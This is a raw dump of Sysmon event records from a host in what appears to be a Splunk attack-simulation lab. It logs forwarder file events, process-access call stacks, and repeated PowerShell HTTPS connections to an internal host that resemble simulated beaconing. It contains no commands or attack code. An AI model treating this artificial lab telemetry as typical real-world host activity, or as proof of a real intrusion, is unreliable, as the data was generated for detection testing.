354300x800000000000000035129466Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:09.177{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62277-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129469Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:46.654{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83AED04BE1779BC6C8DE41323442E715,SHA256=5578788E6EAC59265943B919623B846814C28C39A3D9B5C96AE9D9D7BD8BE005,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129468Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:10.388{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62278-false10.0.1.12-8000- 23542300x800000000000000035129470Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:47.669{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D51F96737844B314D47515A98A9444A,SHA256=AEFCB428FA51308A0CBE626527AB92190C49B6D4549386FCDD92F9104BA96FA8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129472Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:48.683{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3622E9314C0C0039226BE54B267AC56B,SHA256=B2C577BC7997FDA244D7F0469EE442EFB7F3D4BC294693B37724D144DB025E57,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129471Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:48.221{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=94CDA7C5516601BDE7F4CA5D445D74B0,SHA256=9E3C11977D00D5B82C2E33B8192D4E8ED5B3198BFD9374828715F21DE5E1B632,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129473Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:49.703{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F071D4CC8640690AC7B4436B82CD62EF,SHA256=DC46974FA591471287383B0998EA9DC26A1DBC67B8443788D4D7CCB11C43FEA1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129475Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:50.718{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=616F2F49358B9A5B0D9CC55C0B5420FE,SHA256=2E613A821954317035FB2E551DEB152317BA5F7031F4D7E6F98946C1DC6711A9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129474Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:13.192{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62279-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129476Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:51.749{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6EE83C3560923CF2031A1DE5299CF9C,SHA256=BD53741F75C3649EC047A76BA65BF0070913231D8C00B090820487A7611078F3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129478Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:52.760{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2312123A01F6D81BC22330EEB4C8CB04,SHA256=57CC0E5013CF680002182D3879D7C15138915D09CD52FB4568E411E35350ECFD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129477Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:15.436{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62280-false10.0.1.12-8000- 23542300x800000000000000035129481Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:53.778{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF0C6581A5B55C5ED1B93E2B7DF197F0,SHA256=83917316C4BCCD266B09E1C1D9CF064BF21A36784D7F682B57BB043C45125B50,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129480Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:18.204{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62281-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129479Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:53.158{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5AAD69D4620DFAD6C634344EE69D06F0,SHA256=0B23EA2AD41FDA7C51B8F7FA8EEC9A69C5F8D25DA71D49FAB3C8B086E23DAD19,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129484Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:54.840{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FE37F2F1879486634F74FB8CF134704,SHA256=297162F17DFAC51123714BD506173FAF712BC28ACA452C9B931596640CAC7D65,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129483Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:18.728{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62283-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035129482Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:18.633{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62282-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129485Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:55.860{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43A629E769AC4C3D372C3FE6A4BB7297,SHA256=8A982AE1349FC3C451FD97696474C98B5BD32FC8B006E6A22A98ED5105803183,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129487Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:56.876{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1EDFFDA5C4E6A5086BE0CC80F4CD4E5,SHA256=74263D57F1853EBB76F8B63D14F7DFB2092864E37B7B61ADCDEF620F2EFF7090,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129486Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:20.441{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62284-false10.0.1.12-8000- 23542300x800000000000000035129488Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:57.890{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AC7E53A708A891535619E75CC0A3D19,SHA256=806C7A36A7EB049496B7C20E29C22D065010C40F51E7937ADA03C17D25B63F9C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129490Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:58.936{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9FA897D14DCE5F0E57C933AEA6B9078,SHA256=EEC75F5417E4F2B89669C032675CA3943A94C6A077E421F08A55A4DE205C64E3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129489Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:58.636{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4AA6E17A98B2F30F7A2A503BEB9D880A,SHA256=8B0A3B6F9E706C093B71E57C5474544251F67965B07682F05A0795C59F65F387,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129492Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:59.954{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=918798120EC1D97885D6991AD1A2854B,SHA256=A730A398D55E8EE2D4F2B399603422256EA191194455F70D660BFCF979319A9C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129491Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:23.739{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62285-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129494Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:00.971{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A222BD5216244C04E0479DF689EA881E,SHA256=F03308C47585AEBD9AF4847CB60F0BE71D1B675203920D34EBC18CD8F95D7A0C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129493Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:00.172{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129497Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:01.995{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9189810432B61E1B60604F04BA40CE14,SHA256=FF38B0F6DDD48962B11F55D39C8B73EC3C7E7569A8E28466F6A7E9FF9B38B28D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129496Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:26.336{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62287-false10.0.1.12-8089- 354300x800000000000000035129495Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:26.236{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62286-false10.0.1.12-8000- 23542300x800000000000000035129498Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:02.579{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=281DE26B12FF2354DB55E6C4DA545BAE,SHA256=C01160A4346A229157CF5E176B92BE23F82E2402B04C326852E4B60A4EC390A8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129500Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:27.757{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62288-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129499Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:03.025{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=518B19E1400DCD0CC8BB480E5DE29A0C,SHA256=8A3AA7A2B48ABEF1E4A21D60102EA369219EB62DDF39CF3CD44D2175D6CCCE93,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129502Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:28.045{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62289-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129501Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:04.061{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2C9F20AFF295AEF6D24F2A3BFFCFC23,SHA256=9A29DEBE29A14026BCDCA6558563995EAE4EAFC4CF8A78B571A1E2D8DBD3C45E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129503Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:05.079{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3F66D1028B09FF7DE767549196384B4,SHA256=4CA0CA8DA8A543251E3560466172C00FC5684C72BF7BD4A90A3AC7FF3F67FC03,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129505Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:31.361{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62290-false10.0.1.12-8000- 23542300x800000000000000035129504Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:06.128{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3723222C28E640014425EC298238FD89,SHA256=2D911A612349072C5E296089C92073CA1A35ACA3C9E3A315A01A9F3DD6732B36,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129506Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:07.158{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13E596FE8ECC1B7D36D1F2A78E3440C0,SHA256=5DFD5EBA3C26B8010410C26FB937707189A567A6785CFB7B36FE8FD6D6EF3649,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129507Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:08.175{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDF82D272C3D948EABC142AA71829404,SHA256=B963554125F85E666ED103D2BEBF8CCE5F897B5892122201F6A213C89BBE8954,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129509Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:09.193{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59C220571E1F729FF81E450CEAE443B0,SHA256=2FEB2C7AD887F0943C49DEB8DA0BB5B2F4807F33284907199E61A08E0C9E2E28,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129508Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:09.094{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C5DEE4FE70AEF4CD122B962E15AD8843,SHA256=D49DAFD8CFF6F1DD9EFBF04A2C258F8DCF15B81FA4E99F1DE0D716B706B7ED12,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129520Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:34.059{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62291-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035129519Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:10.708{B81B27B7-849E-613A-0197-03000000C801}56446584C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129518Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:10.523{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-849E-613A-0197-03000000C801}5644C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129517Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:10.523{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129516Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:10.523{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129515Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:10.523{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129514Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 